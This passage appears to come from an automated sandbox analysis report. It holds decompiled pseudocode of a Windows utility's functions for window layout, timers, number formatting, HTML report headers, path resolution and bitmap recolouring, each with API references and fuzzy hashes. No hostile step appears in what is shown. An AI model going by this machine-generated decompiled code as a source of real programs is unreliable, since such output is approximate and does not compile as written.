                                                                                                                                                0x0040a6fe

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32 ref: 0040A5CA
                                                                                                                                                • GetWindowRect.USER32 ref: 0040A5E0
                                                                                                                                                • GetWindowRect.USER32 ref: 0040A5F6
                                                                                                                                                • GetDlgItem.USER32 ref: 0040A630
                                                                                                                                                • GetWindowRect.USER32 ref: 0040A637
                                                                                                                                                • MapWindowPoints.USER32 ref: 0040A647
                                                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040A66B
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040A6F5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                • Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                • Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
                                                                                                                                                • Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                • Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00403899, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101timewindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				void* __esi;
				struct HDWP__* _t27;
				intOrPtr* _t51;
				RECT* _t56;

				_push(__ecx);
				_t51 = __ecx;
				if(_a4 != 0x18) {
					L4:
					if(_a4 == 2) {
						KillTimer( *(_t51 + 0x10), 0x41);
					}
					if(_a4 != 0x113) {
						L11:
						if(_a4 == 5) {
							_t27 = BeginDeferWindowPos(5);
							_t56 = _t51 + 0x40;
							_v8 = _t27;
							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
							EndDeferWindowPos(_v8);
							InvalidateRect( *(_t56 + 0x10), _t56, 1);
						}
						goto L13;
					} else {
						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
							L13:
							return E004015CE(_t51, _a4, _a8, _a12);
						} else {
							 *((intOrPtr*)(_t51 + 0x78)) = 0;
							 *((intOrPtr*)( *_t51 + 4))(0);
							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
							goto L11;
						}
					}
				}
				if(_a8 == 0) {
					KillTimer( *(__ecx + 0x10), 0x41);
					goto L4;
				}
				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
				goto L13;
			}








                                                                                                                                                0x0040389c
                                                                                                                                                0x004038ac
                                                                                                                                                0x004038ae
                                                                                                                                                0x004038cf
                                                                                                                                                0x004038d3
                                                                                                                                                0x004038da
                                                                                                                                                0x004038da
                                                                                                                                                0x004038e3
                                                                                                                                                0x0040392e
                                                                                                                                                0x00403932
                                                                                                                                                0x00403936
                                                                                                                                                0x00403945
                                                                                                                                                0x00403949
                                                                                                                                                0x0040394c
                                                                                                                                                0x0040395d
                                                                                                                                                0x0040396e
                                                                                                                                                0x0040397f
                                                                                                                                                0x00403990
                                                                                                                                                0x00403998
                                                                                                                                                0x004039a4
                                                                                                                                                0x004039a4
                                                                                                                                                0x00000000
                                                                                                                                                0x004038e5
                                                                                                                                                0x004038e9
                                                                                                                                                0x004039aa
                                                                                                                                                0x004039be
                                                                                                                                                0x0040390c
                                                                                                                                                0x00403911
                                                                                                                                                0x00403914
                                                                                                                                                0x00403928
                                                                                                                                                0x00000000
                                                                                                                                                0x00403928
                                                                                                                                                0x004038e9
                                                                                                                                                0x004038e3
                                                                                                                                                0x004038b3
                                                                                                                                                0x004038cd
                                                                                                                                                0x00000000
                                                                                                                                                0x004038cd
                                                                                                                                                0x004038bd
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004038CD
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004038DA
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004038F8
                                                                                                                                                • GetParent.USER32(?), ref: 00403921
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00403928
                                                                                                                                                • BeginDeferWindowPos.USER32 ref: 00403936
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 00403998
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004039A4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                • Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
                                                                                                                                                • Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                • Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D7CE, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040DFD6();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040DFD6();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040DFD6();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040DFD6();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                                                0x0040d7e1
                                                                                                                                                0x0040d7e6
                                                                                                                                                0x0040d7e7
                                                                                                                                                0x0040d7e8
                                                                                                                                                0x0040d875
                                                                                                                                                0x0040d87c
                                                                                                                                                0x0040d88a
                                                                                                                                                0x0040d891
                                                                                                                                                0x0040d89f
                                                                                                                                                0x0040d8a6
                                                                                                                                                0x0040d8c0
                                                                                                                                                0x0040d8cb
                                                                                                                                                0x0040d8dd
                                                                                                                                                0x0040d8fb
                                                                                                                                                0x0040d900
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d900
                                                                                                                                                0x0040d7f5
                                                                                                                                                0x0040d7fc
                                                                                                                                                0x0040d80a
                                                                                                                                                0x0040d811
                                                                                                                                                0x0040d82b
                                                                                                                                                0x0040d838
                                                                                                                                                0x0040d84a
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                • Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
                                                                                                                                                • Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                • Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407047, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040E340(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x4131d0; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00406CC6(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00406DE5(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E00406F88, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00406CC6(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x412c34 =  *0x412c34 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E00406E97(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                                                0x0040704f
                                                                                                                                                0x00407054
                                                                                                                                                0x0040705b
                                                                                                                                                0x00407098
                                                                                                                                                0x0040709c
                                                                                                                                                0x004070a2
                                                                                                                                                0x004070aa
                                                                                                                                                0x004070ac
                                                                                                                                                0x004070c2
                                                                                                                                                0x004070c2
                                                                                                                                                0x004070c7
                                                                                                                                                0x004070c8
                                                                                                                                                0x004070e2
                                                                                                                                                0x004070e4
                                                                                                                                                0x004070e6
                                                                                                                                                0x004070e9
                                                                                                                                                0x004070fc
                                                                                                                                                0x004070fc
                                                                                                                                                0x0040710c
                                                                                                                                                0x00407113
                                                                                                                                                0x0040712a
                                                                                                                                                0x00407130
                                                                                                                                                0x00407137
                                                                                                                                                0x00407146
                                                                                                                                                0x0040714b
                                                                                                                                                0x00407157
                                                                                                                                                0x00407160
                                                                                                                                                0x004070ae
                                                                                                                                                0x004070bc
                                                                                                                                                0x004070bc
                                                                                                                                                0x004070be
                                                                                                                                                0x004070c0
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004070b0
                                                                                                                                                0x004070b3
                                                                                                                                                0x004070b9
                                                                                                                                                0x004070b9
                                                                                                                                                0x00000000
                                                                                                                                                0x004070b9
                                                                                                                                                0x00000000
                                                                                                                                                0x004070b3
                                                                                                                                                0x00000000
                                                                                                                                                0x004070bc
                                                                                                                                                0x004070ac
                                                                                                                                                0x0040705d
                                                                                                                                                0x0040705d
                                                                                                                                                0x00407062
                                                                                                                                                0x00407063
                                                                                                                                                0x00407068
                                                                                                                                                0x0040706f
                                                                                                                                                0x00407075
                                                                                                                                                0x0040707c
                                                                                                                                                0x0040707e
                                                                                                                                                0x00407080
                                                                                                                                                0x00407081
                                                                                                                                                0x00407084
                                                                                                                                                0x0040708d
                                                                                                                                                0x0040708d
                                                                                                                                                0x00407166
                                                                                                                                                0x0040716d

                                                                                                                                                APIs
                                                                                                                                                • LoadMenuW.USER32 ref: 0040706F
                                                                                                                                                  • Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
                                                                                                                                                  • Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
                                                                                                                                                  • Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
                                                                                                                                                  • Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040708D
                                                                                                                                                • CreateDialogParamW.USER32 ref: 004070E2
                                                                                                                                                • GetDesktopWindow.USER32 ref: 004070ED
                                                                                                                                                • CreateDialogParamW.USER32 ref: 004070FA
                                                                                                                                                • memset.MSVCRT ref: 00407113
                                                                                                                                                • GetWindowTextW.USER32 ref: 0040712A
                                                                                                                                                • EnumChildWindows.USER32 ref: 00407157
                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 00407160
                                                                                                                                                  • Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                • Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                • Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
                                                                                                                                                • Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                • Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409D04, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 65%
                                                                                                                                                			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040E340(0x1800, __ecx);
				_t57 = _t49;
				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x412ed0; // 0x0
				if(_t62 != 0) {
					_push(0x412ed0);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040DFD6();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x412ecc; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040DFD6();
				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00409336(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                                                0x00409d04
                                                                                                                                                0x00409d0c
                                                                                                                                                0x00409d1c
                                                                                                                                                0x00409d20
                                                                                                                                                0x00409d35
                                                                                                                                                0x00409d3c
                                                                                                                                                0x00409d4a
                                                                                                                                                0x00409d51
                                                                                                                                                0x00409d5f
                                                                                                                                                0x00409d66
                                                                                                                                                0x00409d6b
                                                                                                                                                0x00409d6e
                                                                                                                                                0x00409d7a
                                                                                                                                                0x00409d7c
                                                                                                                                                0x00409d81
                                                                                                                                                0x00409d8c
                                                                                                                                                0x00409d8d
                                                                                                                                                0x00409d8e
                                                                                                                                                0x00409d93
                                                                                                                                                0x00409d93
                                                                                                                                                0x00409d96
                                                                                                                                                0x00409d9c
                                                                                                                                                0x00409daa
                                                                                                                                                0x00409db0
                                                                                                                                                0x00409dcb
                                                                                                                                                0x00409de5
                                                                                                                                                0x00409de6
                                                                                                                                                0x00409df1
                                                                                                                                                0x00409df2
                                                                                                                                                0x00409df3
                                                                                                                                                0x00409e07
                                                                                                                                                0x00409e0c
                                                                                                                                                0x00409e10
                                                                                                                                                0x00000000
                                                                                                                                                0x00409e15
                                                                                                                                                0x00409e1e

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00409DA4
                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                • Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                • Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
                                                                                                                                                • Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                • Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040CAF2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040546C(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E004059AA( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E004059AA( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                0x0040caf2
                                                                                                                                                0x0040cb00
                                                                                                                                                0x0040cb0b
                                                                                                                                                0x0040cb14
                                                                                                                                                0x0040cb33
                                                                                                                                                0x0040cb3b
                                                                                                                                                0x0040cb83
                                                                                                                                                0x0040cbcc
                                                                                                                                                0x0040cb85
                                                                                                                                                0x0040cb8b
                                                                                                                                                0x0040cb99
                                                                                                                                                0x0040cba5
                                                                                                                                                0x0040cbb4
                                                                                                                                                0x0040cbb9
                                                                                                                                                0x0040cbc0
                                                                                                                                                0x0040cbc5
                                                                                                                                                0x0040cb3d
                                                                                                                                                0x0040cb43
                                                                                                                                                0x0040cb51
                                                                                                                                                0x0040cb5d
                                                                                                                                                0x0040cb6a
                                                                                                                                                0x0040cb75
                                                                                                                                                0x0040cb7a
                                                                                                                                                0x0040cbd4
                                                                                                                                                0x0040cbd7
                                                                                                                                                0x0040cbd7
                                                                                                                                                0x0040cb19
                                                                                                                                                0x0040cb1a
                                                                                                                                                0x0040cb1b
                                                                                                                                                0x00000000
                                                                                                                                                0x0040cb21
                                                                                                                                                0x0040cb02
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040CB0B
                                                                                                                                                • wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                  • Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
                                                                                                                                                  • Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
                                                                                                                                                  • Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0
                                                                                                                                                • wcscpy.MSVCRT ref: 0040CB6A
                                                                                                                                                • wcscat.MSVCRT ref: 0040CB75
                                                                                                                                                • memset.MSVCRT ref: 0040CB51
                                                                                                                                                  • Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
                                                                                                                                                  • Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0
                                                                                                                                                • memset.MSVCRT ref: 0040CB99
                                                                                                                                                • memcpy.MSVCRT ref: 0040CBB4
                                                                                                                                                • wcscat.MSVCRT ref: 0040CBC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                • Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                • Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
                                                                                                                                                • Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                • Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402DE1, Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                			E00402DE1(void* __fp0) {
				void* _v24;
				void _v28;
				void* _v56;
				intOrPtr _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				intOrPtr _v84;
				long _v88;
				intOrPtr _v92;
				int _v96;
				int _v100;
				intOrPtr _v104;
				int _v108;
				int _v112;
				intOrPtr _v128;
				unsigned int _t51;
				signed char _t52;
				intOrPtr _t53;
				intOrPtr _t64;
				struct HDC__* _t75;

				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v56, 0x18,  &_v28);
				_t75 = CreateCompatibleDC(0);
				_v64 = SelectObject(_t75, _v72);
				_v72 = GetSysColor(0xf);
				_v88 = GetPixel(_t75, 0, 0);
				_v96 = 0;
				if(_v56 > 0) {
					do {
						_v100 = 0;
						if(_v60 > 0) {
							do {
								_t51 = GetPixel(_t75, _v100, _v96);
								if(_t51 != _v100) {
									_t52 = _t51 & 0x000000ff;
									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
									asm("fild dword [esp+0x20]");
									asm("fistp qword [esp+0x28]");
									_t64 = _v84;
									_v92 = _t64;
									asm("fisub dword [esp+0x20]");
									asm("fldz");
									asm("fcomp st0, st1");
									asm("fnstsw ax");
									if((_t52 & 0x00000041) == 0) {
										asm("fchs");
									}
									asm("fcomp qword [0x410b70]");
									asm("fnstsw ax");
									_t53 = _t64 + 1;
									if((_t52 & 0x00000001) != 0) {
										_t53 = _t64;
									}
									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
								} else {
									_push(_v96);
								}
								SetPixel(_t75, _v112, _v108, ??);
